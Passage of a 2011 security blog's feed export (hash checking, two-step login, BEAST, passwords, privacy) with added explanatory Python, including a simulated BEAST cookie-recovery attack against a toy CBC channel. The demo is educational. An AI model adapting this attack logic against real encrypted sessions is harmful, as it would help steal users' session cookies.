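SAMPLE_FILE = b"#!/bin/sh\necho 'installing example tool'\n"
# The same file after an unauthorised change (also constructed).
TAMPERED_FILE = SAMPLE_FILE.replace(b"example tool", b"something else")

# MD5 and SHA-1 are listed because the post mentions them; both are broken for
# collision resistance, so anyone publishing hashes today should use SHA-256.
ALGORITHMS = ("md5", "sha1", "sha256")


def digest_bytes(data, algorithm="sha256"):
    """Hex digest of an in-memory byte string."""
    return hashlib.new(algorithm, data).hexdigest()


def digest_file(path, algorithm="sha256"):
    """Hex digest of a file, read in 64 KiB chunks so large downloads fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def all_digests(path):
    """What a browser download window could show next to the file name."""
    return {alg: digest_file(path, alg) for alg in ALGORITHMS}


def verify_file(path, expected_hex, algorithm="sha256"):
    """Compare the file's digest with a published value.

    hmac.compare_digest runs in constant time; a plain == would do for a
    public hash, but using it everywhere keeps the habit of not leaking
    comparison timing.
    """
    actual = digest_file(path, algorithm)
    return hmac.compare_digest(actual, expected_hex.strip().lower())


def write_temp(data):
    """Write constructed sample bytes to a temporary file and return its path."""
    fd, path = tempfile.mkstemp(suffix=".download")
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path


def demo():
    """Walk through the three cases the post describes; returns a result dict."""
    genuine = write_temp(SAMPLE_FILE)
    tampered = write_temp(TAMPERED_FILE)
    try:
        # The publisher's hash, obtained out of band (from the vendor's own
        # page, for instance, not from the mirror that served the file).
        published = digest_bytes(SAMPLE_FILE, "sha256")
        results = {
            # Case 1: an untouched download matches the published value.
            "genuine_ok": verify_file(genuine, published),
            # Case 2: a modified download is caught because its hash differs.
            "tampered_detected": not verify_file(tampered, published),
            # Case 3: the caveat from the post. If the attacker controls the
            # server, they republish the hash of the tampered file and the
            # check passes. Only a signature, or a hash obtained through an
            # independent channel, closes that gap.
            "attacker_controls_both": verify_file(
                tampered, digest_bytes(TAMPERED_FILE, "sha256")
            ),
        }
    finally:
        os.remove(genuine)
        os.remove(tampered)
    return results


if __name__ == "__main__":
    sample_path = write_temp(SAMPLE_FILE)
    for alg, value in all_digests(sample_path).items():
        print(f"{alg:7s} {value}")
    os.remove(sample_path)
    print(demo())
```

Running the block prints the three digests of the sample file and the result dictionary from demo(); the streaming read in digest_file is the part worth keeping for real downloads, since installers are far larger than this sample.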
Despite that, this would still be a nice start down the long road of security awareness for the masses.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-6779135987223157491?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/6779135987223157491/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/give-hash-chance.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/6779135987223157491'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/6779135987223157491'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/give-hash-chance.html' title='Give Hash a Chance'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-1487417171038853472</id><published>2011-10-17T10:02:00.000-07:00</published><updated>2011-10-17T10:02:30.279-07:00</updated><title type='text'>And then there were lawsuits...</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Facebook is being sued in Federal 
court for violating US wiretapping laws. Now, I must admit that when I first heard this I was a little bit surprised. I mean, how dumb could they be? Facebook is a billion dollar empire with an army of lawyers, surely they wouldn't do something this heinous. Well it turns out they would... A &lt;a href="http://www.theregister.co.uk/2011/10/14/facebook_tracking_lawsuit/"&gt;woman in Mississippi&lt;/a&gt; is seeking class action status in her lawsuit, which accuses Facebook of monitoring users' browser habits even when they are logged out of the website.&lt;br /&gt;&lt;br /&gt;Ever wonder how Facebook knows what advertisements to display when you're logged in spying on your friends? Well apparently they're doing so by tracking your activity on the web. The lawsuit specifically focuses on the 'like' buttons that users click when logged out of Facebook, however I personally think the abuse is much more wide-spread. It really makes you wonder what the company would do if no one ever reported the problem.&lt;br /&gt;&lt;br /&gt;Facebook has had numerous complaints of questionable morals in the past, however this appears to be a new low. Of course, this story will likely get swept under the rug like so many other violations of personal privacy often are. The sad fact of the matter is that without a lawsuit with serious financial repercussions Facebook will likely get a slap on the wrist and claim it was an accident. Even if the complaint is proven in court and Facebook is found guilty, I highly doubt we'd ever see prison terms issued to their corporate staff... Let's hope the lawsuit gets the class action status they seek and that each user gets a nice check sent to them. 
Perhaps then companies like Facebook will learn that this type of behavior is more costly than worthwhile.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-1487417171038853472?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/1487417171038853472/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/and-then-there-were-lawsuits.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/1487417171038853472'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/1487417171038853472'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/and-then-there-were-lawsuits.html' title='And then there were lawsuits...'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-6173738713978777356</id><published>2011-10-16T17:47:00.000-07:00</published><updated>2011-10-16T17:51:14.491-07:00</updated><title type='text'>Google 2 Form Authentication !</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;So I just found out that Google is now offering 2-step verification (a form of two-factor authentication) for Gmail users. 
Two-step verification basically means that Google will require a one-time code, on top of the password, whenever someone attempts to sign in to their Gmail account from a browser it does not already trust. In this case, Google will send out a text message with the one-time code. That way, if someone were to actually figure out your password, they still couldn't access your Google account without also having your phone.&lt;br /&gt;&lt;br /&gt;Now this may seem excessive to some but I personally live out of my Gmail account. I've literally got thousands of emails archived and often rely on the search functionality for contacts or account information. I've signed up for the service and have started using it; I gotta admit- I am very impressed. Way to go Google, this is great!&amp;nbsp; In addition to the one-time code for webmail access, Google will also generate application-specific passwords (mine was 16 characters..) that enable you to link Google services to other devices or mail clients that can't prompt for a code, like an Android phone. The passphrase gets saved on the device, however it can be revoked at any time.&lt;br /&gt;&lt;br /&gt;For anyone using Gmail or any other type of Google application, I highly suggest that you take advantage of this feature and enroll in two-step verification. A browser can be remembered as trusted for up to 30 days, for anyone who finds typing in a code each time they access their webmail from their home computer annoying. The nice thing, however, is that any other web browser used to access the account would still require a fresh code. &lt;br /&gt;&lt;br /&gt;To enable the feature log into your Gmail account, click on 'Account Settings' then 'Using 2 Step Verification' in the middle of the page. The process is rather painless provided that you've already got a cell phone number linked to your Gmail account (who doesn't?). 
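As an added example (not part of the original post, and not Google's code), here is how a one-time login code of the kind described above is generated and checked. It implements HOTP (RFC 4226) and TOTP (RFC 6238) directly on the Python standard library. Google may produce the code it sends by SMS however it likes, so treating the code as a TOTP value is an assumption; the shared secret, the RFC test vectors used below, and the TotpVerifier class are constructed for this example.

```python
import hashlib
import hmac
import struct
import time


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, dynamically
    truncated to a 31-bit integer and reduced to `digits` decimal digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] % 16                       # low nibble of the last byte picks the window
    window = struct.unpack(">I", mac[offset:offset + 4])[0] % 0x80000000   # drop the sign bit
    return str(window % (10 ** digits)).zfill(digits)


def totp(secret: bytes, for_time=None, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP whose counter is the number of `step`-second periods
    since the Unix epoch, so phone and server agree without sharing state."""
    if for_time is None:
        for_time = time.time()
    return hotp(secret, int(for_time // step), digits)


class TotpVerifier:
    """Server-side check. Accepts the code for the current period or `skew`
    periods either side (clock drift), compares in constant time, and never
    accepts a period that has already been used: a code seen over someone's
    shoulder (or a sniffed SMS) must not work a second time."""

    def __init__(self, secret: bytes, step: int = 30, digits: int = 6, skew: int = 1):
        self.secret, self.step, self.digits, self.skew = secret, step, digits, skew
        self.last_accepted = -1                 # highest period already consumed

    def verify(self, code: str, now=None) -> bool:
        if now is None:
            now = time.time()
        current = int(now // self.step)
        for period in range(current - self.skew, current + self.skew + 1):
            if period > self.last_accepted and hmac.compare_digest(
                hotp(self.secret, period, self.digits), code
            ):
                self.last_accepted = period
                return True
        return False


if __name__ == "__main__":
    # Constructed demo secret; a real enrolment would generate 20 random bytes and
    # hand them to the phone as base32 text or a QR code.
    secret = b"12345678901234567890"
    code = totp(secret)
    print("code for this 30-second period:", code)
    checker = TotpVerifier(secret)
    print("first use accepted:", checker.verify(code))
    print("replay accepted:", checker.verify(code))
```

The two things worth copying from the verifier are the constant-time comparison and the replay check: a six-digit code is short enough that a timing leak or a second acceptance of an already-used code is the difference between "needs your phone" and "needs to have seen your screen once".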
&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;This is where you go to enroll...&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-y3-A99NmSWA/Tpt795DbpHI/AAAAAAAAABU/9LShsvZ_dcg/s1600/Google2Form1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-y3-A99NmSWA/Tpt795DbpHI/AAAAAAAAABU/9LShsvZ_dcg/s1600/Google2Form1.png" /&gt;&lt;/a&gt;&lt;/div&gt;Each time you log in, you'll see the prompt below and receive a text message with the one-time code.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-6idB3IZ9Shg/Tpt5rridwHI/AAAAAAAAABE/YL2N7m78AcM/s1600/google2form.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-6idB3IZ9Shg/Tpt5rridwHI/AAAAAAAAABE/YL2N7m78AcM/s1600/google2form.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-6173738713978777356?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 
href='http://paranoid-security.blogspot.com/feeds/6173738713978777356/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/google-2-form-authentication.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/6173738713978777356'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/6173738713978777356'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/google-2-form-authentication.html' title='Google 2 Form Authentication !'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-y3-A99NmSWA/Tpt795DbpHI/AAAAAAAAABU/9LShsvZ_dcg/s72-c/Google2Form1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-2369753478094430951</id><published>2011-10-13T09:20:00.001-07:00</published><updated>2011-10-13T09:20:01.645-07:00</updated><title type='text'>Good v. Good Enough</title><content type='html'>When it comes to security I find that there are two wildly different philosophies on what is needed. Some organizations take the approach that security is a headache which they are required to deal with, often as an afterthought to whatever project they just completed; I'll refer to these as type A's. 
Type B organizations, on the other hand, recognize security as a critical component of everything they do and consider security-related issues throughout the implementation of their operations. &lt;br/&gt;  &lt;br/&gt;  From what I've seen, most companies today are type A organizations. They often put into place half-assed attempts to provide the illusion of security and never really worry about what would happen if their systems or processes were to fail. For a type A organization, security just needs to be good enough that in the event of a breach, executives don't appear negligent. &lt;br/&gt;  &lt;br/&gt; Type A organizations often wind up victims of various attacks and are always in react mode until something serious happens, like a lawsuit for losing customers' personal information. When that happens, type A organizations typically experience extreme growing pains and panic as they begin hiring 'experts' who attempt to fix their broken systems. At that point a type A begins to understand why type B's put so much energy into always being secure. &lt;br/&gt;  &lt;br/&gt; Security should never be an afterthought; it should be a fundamental pillar of every product or project that companies put together. 
It's important that companies understand the differences and benefits of having good security instead of just good enough.&lt;div style='clear: both; text-align: center; font-size: xx-small;'&gt;Published with Blogger-droid v1.7.4&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-2369753478094430951?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/2369753478094430951/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/good-v-good-enough.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/2369753478094430951'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/2369753478094430951'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/good-v-good-enough.html' title='Good v. 
Good Enough'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-2337717620956089135</id><published>2011-10-11T23:24:00.000-07:00</published><updated>2011-10-11T23:24:42.051-07:00</updated><title type='text'>They Broke the Internet...</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;a href="http://www.theregister.co.uk/2011/09/19/beast_exploits_paypal_ssl/"&gt;Last month&lt;/a&gt; a couple of researchers from Buenos Aires figured out how to exploit SSL 3.0 &amp;amp; TLS 1.0 using an application they've dubbed 'BEAST' (browser exploit against SSL/TLS). Now while this may be old news for some, it's amazing to me that more of the major news media outlets haven't picked up on this story. While it's true that this is not a remote attack on the server (the attacker has to be positioned to observe the victim's encrypted traffic and to get code running in the victim's browser), almost every website out there today is running TLS 1.0 or SSL 3.0. Banks, credit card companies, corporate webmail servers... they're all vulnerable. &lt;br /&gt;&lt;br /&gt;The attack works by leveraging a well-known 'theoretical' vulnerability (the predictable, chained IVs of CBC mode in SSL 3.0 and TLS 1.0) that had never actually been demonstrated in practice. I guess in my eyes that means it is also theoretically possible that someone somewhere (NSA? Mossad?) has known about this exploit for a very long time and never said anything. 
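To make that 'theoretical' weakness concrete, here is an added example (not the researchers' BEAST tool, and not code from the original post) that simulates the flaw the attack rests on: in SSL 3.0 and TLS 1.0, CBC records are chained, so the IV of the next record is the last ciphertext block of the previous one, which an eavesdropper has already seen. The block cipher is replaced by a keyed PRF (HMAC-SHA256 truncated to 16 bytes), which is enough because the attack only encrypts and compares ciphertext; the cookie value, key, first IV, toy padding and all helper names are constructed for this example. The attacker's ability to make the victim send records with a chosen prefix and to inject records of its own models what BEAST did from script in the victim's browser. The same record layer with an explicit per-record IV, which is what TLS 1.1 introduced, defeats the attack.

```python
import hashlib
import hmac
import os

BLOCK = 16


def xor_blocks(*blocks: bytes) -> bytes:
    out = bytearray(BLOCK)
    for block in blocks:
        for j in range(BLOCK):
            out[j] ^= block[j]
    return bytes(out)


class CbcRecordLayer:
    """Toy CBC record layer. Chained IVs (SSL 3.0 / TLS 1.0): the IV of each
    record is the last ciphertext block of the previous record, already visible
    to anyone watching the wire. Explicit IVs (TLS 1.1 and later): each record
    starts with a fresh random IV, so it cannot be predicted in advance."""

    def __init__(self, key: bytes, first_iv: bytes, explicit_iv: bool = False):
        self.key = key
        self.iv = first_iv                      # chaining state, public on the wire
        self.explicit_iv = explicit_iv

    def _encrypt_block(self, block: bytes) -> bytes:
        # Stand-in for AES: a keyed PRF truncated to one block. The attack only
        # encrypts and compares ciphertext, so a PRF is enough to show it.
        return hmac.new(self.key, block, hashlib.sha256).digest()[:BLOCK]

    def send(self, plaintext: bytes) -> list:
        """Encrypt one record and return its ciphertext blocks (what the wire shows)."""
        if len(plaintext) % BLOCK:
            plaintext += b"\x00" * (BLOCK - len(plaintext) % BLOCK)   # toy padding
        prev = os.urandom(BLOCK) if self.explicit_iv else self.iv
        out = []
        for i in range(0, len(plaintext), BLOCK):
            prev = self._encrypt_block(xor_blocks(plaintext[i:i + BLOCK], prev))
            out.append(prev)
        self.iv = prev
        return out


def beast_recover(channel: CbcRecordLayer, victim_send, secret_len: int):
    """Attacker model: sees everything on the wire (channel.iv and all ciphertext),
    can make the victim send records of the form prefix + secret with a chosen
    prefix (in BEAST the secret is the session cookie the browser appends to a
    request whose path the attacker's script chose), and can inject records of
    its own on the same connection. Recovers the secret one byte at a time."""
    recovered = b""
    for i in range(secret_len):
        prefix = b"A" * (15 - i % BLOCK)        # puts secret[i] last in block b
        b = i // BLOCK
        iv_before = channel.iv
        blocks = victim_send(prefix)
        c_prev = iv_before if b == 0 else blocks[b - 1]   # block b is E(P_b XOR c_prev)
        c_target = blocks[b]
        known = (prefix + recovered)[b * BLOCK:b * BLOCK + 15]   # first 15 bytes of P_b
        for g in range(256):
            guess = known + bytes([g])
            # XOR-ing the predicted IV into the chosen plaintext cancels it, so the
            # record layer computes E(guess XOR c_prev), which equals c_target only
            # for the correct guess.
            inject = xor_blocks(guess, c_prev, channel.iv)
            if channel.send(inject)[0] == c_target:
                recovered += bytes([g])
                break
        else:
            return None                         # nothing matched: IV was not predictable
    return recovered


def demo(explicit_iv: bool = False):
    """Returns (recovered, secret). Key, first IV and cookie value are constructed."""
    secret = b"Cookie: sid=s3cr3t-t0ken-value"
    key = hashlib.sha256(b"constructed demo key").digest()
    first_iv = hashlib.sha256(b"constructed first iv").digest()[:BLOCK]
    channel = CbcRecordLayer(key, first_iv, explicit_iv)

    def victim_send(prefix: bytes) -> list:
        return channel.send(prefix + secret)

    return beast_recover(channel, victim_send, len(secret)), secret


if __name__ == "__main__":
    print("TLS 1.0 chained IV :", demo()[0])
    print("TLS 1.1 explicit IV:", demo(explicit_iv=True)[0])
```

At most 256 injected records per secret byte is the whole cost once the victim can be made to align one unknown byte at the end of a block; with the explicit IV the attacker cannot cancel the chaining value it never sees, and the byte-at-a-time check finds nothing.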
After all, if you were one of the bad guys- why would you want anyone to know that you had that level of access? Likewise, if you were one of the 'good guys' why cause any panic or let the bad guys know that it's even possible... &lt;br /&gt;&lt;br /&gt;Either way, this story definitely needs more coverage. Most people probably won't care but there should be some increased pressure put on the owners of vulnerable web servers to fix the issue (upgrade to TLS 1.1 or greater, which gives every record its own unpredictable IV). There's a certain amount of due diligence and ethics that should be adhered to when people are entrusting you with their livelihoods.. The sad fact is however, that the fix has literally existed for years (before the exploit was even discovered!) yet most browsers and websites didn't bother updating their software. Consumers deserve high-quality security- at least there are some good hackers out there standing up for what's right...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-RugdLh427l4/TpUqI766dAI/AAAAAAAAAA0/J7KTYfgPOMM/s1600/qualys_tls_breakdown.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-RugdLh427l4/TpUqI766dAI/AAAAAAAAAA0/J7KTYfgPOMM/s1600/qualys_tls_breakdown.png" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-2337717620956089135?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/2337717620956089135/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/they-broke-internet.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/2337717620956089135'/><link rel='self' 
type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/2337717620956089135'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/they-broke-internet.html' title='They Broke the Internet...'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-RugdLh427l4/TpUqI766dAI/AAAAAAAAAA0/J7KTYfgPOMM/s72-c/qualys_tls_breakdown.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-7802670511009836006</id><published>2011-10-10T22:42:00.000-07:00</published><updated>2011-10-10T22:42:29.771-07:00</updated><title type='text'>p@s5W0rd$</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;A couple of weeks ago a friend of mine had asked me to 'fix' his computer due to the typical Windows behavior. Upon receiving the laptop he immediately entrusted me with his corporate account password. I was taken aback; wow, talk about trust.. but even more interesting was the simplicity of his password. When I asked him about it, he informed me that the password was the same one the IT department had assigned him months before that. 
At first I thought he was just messing with me but upon further discussion I learned that he was completely serious, and worse than that, he looked at me like I was from Mars when I told him I used a different password for every application I used.&amp;nbsp; &lt;br /&gt;&lt;br /&gt;At that moment it occurred to me that I needed to sit down and have a serious chat with my friend about the importance of having a strong password. I mean, it's pretty obvious isn't it? Don't use the same password for multiple logins, mix letters with upper and lower case, use numbers and symbols, make sure it's at least 10 characters long. Pick a word, substitute in symbols for vowels, throw in a few upper case letters here or there, add a couple digits to the beginning, end or middle and voilà, strong password.&lt;br /&gt;&lt;br /&gt;Single sign-on is nice for ease of use but if I were to set a policy I'd prohibit it from being used. Sorry sales dude or corporate suit, you're gonna have to play by the same rules as everyone else. Last week there was an &lt;a href="http://thehackernews.com/2011/10/gpu-cracks-6-character-password-in-4.html"&gt;article published&lt;/a&gt; claiming that by using &lt;a href="https://secure.wikimedia.org/wikipedia/en/wiki/CUDA"&gt;CUDA technology&lt;/a&gt;, researchers were able to crack a 6 character password in just 4 seconds... Increasing to 8 characters took 4 hours - still not too shabby in my eyes.. Sure, this is all being done as an offline attack (meaning no system needs to respond to each attempt) but it's still pretty damn impressive.&lt;br /&gt;&lt;br /&gt;I guess what surprises me most is that even to this day, people still don't recognize how easy it is to steal someone's identity or clean out their bank account. Having a crappy password is just begging someone to mess with you. Unfortunately, I bet a lot of people out there are just like my friend... Hopefully I'm wrong and nothing bad ever does happen to him but then again, why risk it? 
I mean, a little bit of inconvenience or muscle memory isn't such a bad thing- especially when you consider the consequences of getting pwned.&lt;br /&gt;&lt;br /&gt;So sitting here, writing this post it's occurred to me that on any given day I probably go through at least 10 unique passwords depending on what I'm doing. First, when I turn on the laptop, the system BIOS prompts me. Then, when the OS loads, I enter password number 2... Next I load up my Windows VM and sign into the corporate network- password 3.. Personal email - #4... SalesForce.com - #5...&amp;nbsp; this blog - #6.. bank account - #7.. ebay #8... paypal #9.. twitter #10... pandora #11... wireless ssid #12.. I could go on but I think you get my point.. I guess if I counted them all I'd say I've probably got at least 20-30 passwords floating around in my head at any given time..&lt;br /&gt;&lt;br /&gt;Sure I forget one or two from time to time (especially right after changing them...) but I guess that comes with the territory.. 
at least it helps me sleep well each night.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-7802670511009836006?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/7802670511009836006/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/ps5w0rd.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/7802670511009836006'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/7802670511009836006'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/ps5w0rd.html' title='p@s5W0rd$'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-1761085800569395107</id><published>2011-10-09T12:15:00.000-07:00</published><updated>2011-10-09T12:15:06.413-07:00</updated><title type='text'>Who needs ethics?</title><content type='html'>So I just read a couple of interesting articles..&lt;br /&gt;&lt;br /&gt;Seems that the DHS has now developed &lt;a href="http://www.wired.com/threatlevel/2011/10/pre-crime-detection/"&gt;psychic powers&lt;/a&gt; and can identify criminals before crimes are actually committed. If you ask me, this seems like a form of racial profiling applied to hackers. 
&lt;br /&gt;&lt;br /&gt;In Florida, the Washington County public school system has decided to begin &lt;a href="http://www.wjhg.com/home/headlines/Finger_Scan_Devices_Coming_to_Washington_County_School_Buses_131175898.html"&gt;fingerprinting all elementary school children&lt;/a&gt;. The program is intended to aid with roll call as students climb onto the big yellow bus. What could possibly go wrong?&lt;br /&gt;&lt;br /&gt;Ethics aside, I do not see how either of these actions is constitutional. ACLU where are you?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-1761085800569395107?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/1761085800569395107/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/who-needs-ethics.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/1761085800569395107'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/1761085800569395107'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/10/who-needs-ethics.html' title='Who needs ethics?'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-1457795419029305522</id><published>2011-10-08T19:54:00.000-07:00</published><updated>2011-10-08T19:54:10.887-07:00</updated><title type='text'>Privacy is dead.</title><content type='html'>For the last few years I've been becoming more and more leery of technology. I mean, really, this whole being connected 24x7 thing is great up to a certain point, but after a while it kind of gets old. The more people get hooked into the web the more they share about their personal lives and the less they care about privacy. I can't help but feel like the feds are taking full advantage of this situation and adding to their ever-growing databases on everyday citizens.&lt;br /&gt;&lt;br /&gt;Ten years ago, the PATRIOT Act was passed allowing for unprecedented changes to personal freedom; of course these changes were intended to be temporary but no one seemed to care when it was renewed. People seem totally clueless; it's really sad when you think about it. As if standing up for civil liberties were somehow unpatriotic? What a joke.. Someone has got to take a stand and call a spade a spade. If we continue to give up these little inches eventually we'll find ourselves where the sidewalk ends.&lt;br /&gt;&lt;br /&gt;Last year the feds conducted an anonymous survey to gauge the US population to know how to distribute resources to different communities. The Census 